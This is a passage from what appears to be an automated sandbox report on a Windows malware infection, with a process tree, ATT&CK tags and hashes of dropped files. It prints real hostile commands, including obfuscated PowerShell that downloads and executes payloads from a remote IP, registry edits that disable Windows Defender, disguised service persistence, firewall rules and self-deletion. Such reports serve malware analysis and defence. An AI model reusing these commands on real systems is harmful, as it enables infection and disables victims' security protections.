C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 10084⤵
- Program crash
-
C:\Users\Admin\Documents\zsfCb6oFQmmDs_S2Bbddwzsl.exe"C:\Users\Admin\Documents\zsfCb6oFQmmDs_S2Bbddwzsl.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1624857a-7bc6-4f8c-9976-de4f7227adf1.exe"C:\Users\Admin\AppData\Local\Temp\1624857a-7bc6-4f8c-9976-de4f7227adf1.exe"4⤵
-
C:\Users\Admin\Documents\WRV_nd3147gQ3tPAc_hVHB_8.exe"C:\Users\Admin\Documents\WRV_nd3147gQ3tPAc_hVHB_8.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#614⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 6084⤵
- Program crash
-
C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe"C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im _7j7HuriYtP_9nQOmZOUnbSw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im _7j7HuriYtP_9nQOmZOUnbSw.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\YStoivV3td8fghxqUu2SgpQ_.exe"C:\Users\Admin\Documents\YStoivV3td8fghxqUu2SgpQ_.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\snwpteqq\4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fskgslo.exe" C:\Windows\SysWOW64\snwpteqq\4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\fskgslo.exe /d\"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe\"" type= own start= auto DisplayName= "wifi support"4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description snwpteqq "wifi internet conection"4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start snwpteqq4⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵
-
C:\Users\Admin\kxplxqt.exe"C:\Users\Admin\kxplxqt.exe" /d"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vntucuvk.exe" C:\Windows\SysWOW64\snwpteqq\5⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\vntucuvk.exe /d\"C:\Users\Admin\kxplxqt.exe\""5⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start snwpteqq5⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul5⤵
-
C:\Users\Admin\Documents\bL85TOQU5EEEmVqgNQhYQtof.exe"C:\Users\Admin\Documents\bL85TOQU5EEEmVqgNQhYQtof.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\UasdIN9S3pk1MBF6e1GkKLMu.exe"C:\Users\Admin\Documents\UasdIN9S3pk1MBF6e1GkKLMu.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSF5D7.tmp\Install.exe.\Install.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS1DB2.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grsZRWkjR" /SC once /ST 00:34:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\cE8kh8YndrJJjfgDiRSXHBuB.exe"C:\Users\Admin\Documents\cE8kh8YndrJJjfgDiRSXHBuB.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 6444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 6524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 5924⤵
- Program crash
-
C:\Users\Admin\Documents\_XfxA3EI0PT3ie5OHUHFQLMm.exe"C:\Users\Admin\Documents\_XfxA3EI0PT3ie5OHUHFQLMm.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"4⤵
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e file.zip -p320791618516055 -oextracted5⤵
-
C:\Users\Admin\Documents\UkPQqosaxZEWN_UuknyJ6RgF.exe"C:\Users\Admin\Documents\UkPQqosaxZEWN_UuknyJ6RgF.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\LPej8ron26c7SWsJgrCsKxFE.exe"C:\Users\Admin\Documents\LPej8ron26c7SWsJgrCsKxFE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\8RKZYsnKNWccv71JTmpromDN.exe"C:\Users\Admin\Documents\8RKZYsnKNWccv71JTmpromDN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe"C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 20605⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Users\Admin\Documents\g5B8YLScVV_0zfy7P6hxlaVs.exe"C:\Users\Admin\Documents\g5B8YLScVV_0zfy7P6hxlaVs.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe"C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 6082⤵
- Program crash
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3324 -ip 33241⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2008 -ip 20081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4764 -ip 47641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5304 -ip 53041⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif1⤵
-
C:\Windows\SysWOW64\cmd.execmd2⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"3⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"3⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"3⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5284 -ip 52841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 4601⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4764 -ip 47641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5304 -ip 53041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5284 -ip 52841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2008 -ip 20081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 45961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5072 -ip 50721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6928 -ip 69281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4500 -ip 45001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6556 -ip 65561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4500 -ip 45001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6780 -ip 67801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 4641⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6556 -ip 65561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5448 -ip 54481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6928 -ip 69281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7668 -ip 76681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6944 -ip 69441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 6780 -ip 67801⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 5312 -ip 53121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6780 -ip 67801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6592 -ip 65921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6780 -ip 67801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2824 -ip 28241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 6140 -ip 61401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8184 -ip 81841⤵
-
C:\Windows\SysWOW64\snwpteqq\vntucuvk.exeC:\Windows\SysWOW64\snwpteqq\vntucuvk.exe /d"C:\Users\Admin\kxplxqt.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6780 -ip 67801⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4880 -ip 48801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5388 -ip 53881⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751MD5
54e9306f95f32e50ccd58af19753d929
SHA1eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA25645f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA5128711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751MD5
d76cb0dcfe4e83ca0480818fa1a2ac61
SHA1bfe449f0ca852d4827911b08281c8bc643b9d204
SHA25613deaa0dd2ec7dfe8a62953a43e327c07c2f1f4fad04da083cd772a1b7fbac0d
SHA512c57a9f62e2c79675d9cf1a7e5fda0f4bcf40a8d2d29d186ca830b2ac616420a4361eeb57ab882e6878eb56faae4062bd4f02fb2ab081480a19b92ebd1a774abe
-
C:\Users\Admin\AppData\Local\Temp\Complete.exeMD5
92acb4017f38a7ee6c5d2f6ef0d32af2
SHA11b932faf564f18ccc63e5dabff5c705ac30a61b8
SHA2562459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1
SHA512d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73
-
C:\Users\Admin\AppData\Local\Temp\Complete.exeMD5
92acb4017f38a7ee6c5d2f6ef0d32af2
SHA11b932faf564f18ccc63e5dabff5c705ac30a61b8
SHA2562459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1
SHA512d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73
-
C:\Users\Admin\AppData\Local\Temp\Files.exeMD5
2d0217e0c70440d8c82883eadea517b9
SHA1f3b7dd6dbb43b895ba26f67370af99952b7d83cb
SHA256d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01
SHA5126d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d
-
C:\Users\Admin\AppData\Local\Temp\Files.exeMD5
2d0217e0c70440d8c82883eadea517b9
SHA1f3b7dd6dbb43b895ba26f67370af99952b7d83cb
SHA256d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01
SHA5126d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d
-
C:\Users\Admin\AppData\Local\Temp\Folder.exeMD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
C:\Users\Admin\AppData\Local\Temp\Folder.exeMD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
C:\Users\Admin\AppData\Local\Temp\Folder.exeMD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
C:\Users\Admin\AppData\Local\Temp\Info.exeMD5
f67ac68040dcf6a7c499bbc0d149397d
SHA14e61f7ca82126d8aab52a1881965d1ed38f93769
SHA2567b8a8c6b1b0bf9d637c94f73d189f81398837eaa1d9cd431eeff6e7a398a32b4
SHA5124398c085593c7756257dd3eaf859b5e16a393280d2bd2601902c3e44453ad77748a32c95ee9c5ceaf998ebb4b23ab3a9d235351865d2ffe33387657102b61719
-
C:\Users\Admin\AppData\Local\Temp\Info.exeMD5
f67ac68040dcf6a7c499bbc0d149397d
SHA14e61f7ca82126d8aab52a1881965d1ed38f93769
SHA2567b8a8c6b1b0bf9d637c94f73d189f81398837eaa1d9cd431eeff6e7a398a32b4
SHA5124398c085593c7756257dd3eaf859b5e16a393280d2bd2601902c3e44453ad77748a32c95ee9c5ceaf998ebb4b23ab3a9d235351865d2ffe33387657102b61719
-
C:\Users\Admin\AppData\Local\Temp\Info.exeMD5
f67ac68040dcf6a7c499bbc0d149397d
SHA14e61f7ca82126d8aab52a1881965d1ed38f93769
SHA2567b8a8c6b1b0bf9d637c94f73d189f81398837eaa1d9cd431eeff6e7a398a32b4
SHA5124398c085593c7756257dd3eaf859b5e16a393280d2bd2601902c3e44453ad77748a32c95ee9c5ceaf998ebb4b23ab3a9d235351865d2ffe33387657102b61719
-
C:\Users\Admin\AppData\Local\Temp\Install.exeMD5
41b7c6d48d13e1a864bf2d3759e257e6
SHA17ee45121a927d744941651bd6673d3df21f1611b
SHA256820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2
SHA5120ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077
-
C:\Users\Admin\AppData\Local\Temp\Install.exeMD5
41b7c6d48d13e1a864bf2d3759e257e6
SHA17ee45121a927d744941651bd6673d3df21f1611b
SHA256820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2
SHA5120ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exeMD5
509b000635ab3390fa847269b436b6ba
SHA1cc9ea9a28a576def6ae542355558102b6842538b
SHA2567266a9d0f9a50aff61cc32794e421c4215e49e0b54c6b90e13ae05a8a8e5fc12
SHA512c64d0cabeede0f3617d3535767637d8ffc7dc51145f2e2db48b6f720dfe76e2e897e456f91c83235b1b5c9833e468244f2fe67379c0da47b9ea045b1362cebd4
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exeMD5
509b000635ab3390fa847269b436b6ba
SHA1cc9ea9a28a576def6ae542355558102b6842538b
SHA2567266a9d0f9a50aff61cc32794e421c4215e49e0b54c6b90e13ae05a8a8e5fc12
SHA512c64d0cabeede0f3617d3535767637d8ffc7dc51145f2e2db48b6f720dfe76e2e897e456f91c83235b1b5c9833e468244f2fe67379c0da47b9ea045b1362cebd4
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exeMD5
0aaae9372871c955a8ab58a6fa7637f0
SHA1c62a20c20627807e6ea5f5853315f1cd1445b490
SHA2566c9500d159ff494da2ef19e0d9a4cd38648b167dec89d6f8a8ae017819d5c294
SHA5120722cff7d0303fa8031482d08a61d359a8339408a9d16cf28e3138c3da6770ddc87368356d67d6d07f0e2bf8491669979c9189d233393bf65a19716fde26b8a5
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exeMD5
0aaae9372871c955a8ab58a6fa7637f0
SHA1c62a20c20627807e6ea5f5853315f1cd1445b490
SHA2566c9500d159ff494da2ef19e0d9a4cd38648b167dec89d6f8a8ae017819d5c294
